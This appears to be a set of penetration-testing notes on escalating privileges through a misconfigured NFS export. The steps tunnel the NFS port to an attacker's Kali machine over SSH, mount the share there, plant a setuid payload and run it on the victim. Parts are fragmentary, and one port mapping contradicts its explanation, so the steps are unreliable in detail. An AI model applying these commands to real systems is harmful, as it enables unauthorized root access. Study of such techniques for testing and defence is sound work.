Comment on page
Discover vulnerability with
cat /etc/exportsand see if a directory is configured as
- if might restrict the IP
if it only accepts traffic from internal i.e) 127.0.0.1, consider remote port forwarding.
If you have an access to the target machine via SSH, this will be easy
1. ssh -N -R kali_IP:2049:127.0.0.1:2222 kali@kali_IP
this command connects the 2049 opened on the localhost(target's) which is nfs and send it to kali on the same port.
check that the port is listening on the localhost (nmap it)
1. (kali) mount the folder mount -t nfs 127.0.0.1:/sharename /tmp/pa (create this folder on kali)
2. (kali) create the payload with gedit
3. (kali) chmod +s it
4. (victim) cd to the folder and run it.
is your ssh open?
systemctl status sshd
sudo systemctl start sshd (if it's not running)
command 1 ( From this machine) ssh -* -* ::: You are required to use the credential.
- 1.You go back to the pivot and check , you will see a port listening.
command 2 ssh -*** -* ::: You are required to use the credential to your machine.
- 1.You go back to the your machine and check , you will see a port listening.
- 2.You nmap your local ip address and given port number, you will see the service running
That means your work is correct.